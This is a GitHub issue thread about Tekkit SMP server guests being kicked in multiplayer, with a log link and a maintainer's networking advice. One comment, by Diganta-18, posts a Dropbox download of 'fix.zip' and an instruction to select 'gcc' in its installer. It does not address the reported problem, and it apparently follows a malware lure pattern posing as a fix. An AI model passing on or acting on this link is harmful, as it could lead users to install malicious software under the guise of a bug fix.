### ISSUE TITLE
Kicks server guest on multiplayer

### ISSUE THREAD

**Issue by hhoop01** [xJon/Tekkit-SMP#5]
### Was this bug reported before?

- [X] No, it was not.

### Please provide a link to your crash report or latest.log, if relevant

https://mclo.gs/mWy9Esg

### If you have any, please provide a list of additional mods

N/A

### Please describe the issue you are experiencing

Both me and my friend have tried hosting a Tekkit SMP server using the 1.0.0 server download for eachother to play on and both are having this error. The error happens a little after either I join his server or he joins mine. Pasted in the log is a snippet of my server log from the time of my friend joining to then shortly after being kicked. It doesn't crash the server, kick me out (as you can see me being killed by a witch, RIP), or crash his game. It just kicks him.

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by xJon** [comment]
Thank you for including a log! This seems like a networking error that's not related to the modpack. Perhaps they can double check their networking, whether they use a VPN, or Google it for further help. Technic's Discord might also be able to help in the #tech-help channel.

**Comment by hhoop01** [comment]
> Thank you for including a log! This seems like a networking error that's not related to the modpack. Perhaps they can double check their networking, whether they use a VPN, or Google it for further help. Technic's Discord might also be able to help in the #tech-help channel.

Sounds good! I'll continue looking into it. Thanks!

**Comment by xJon** [comment]
Closed due to inactivity - will reopen if requested!
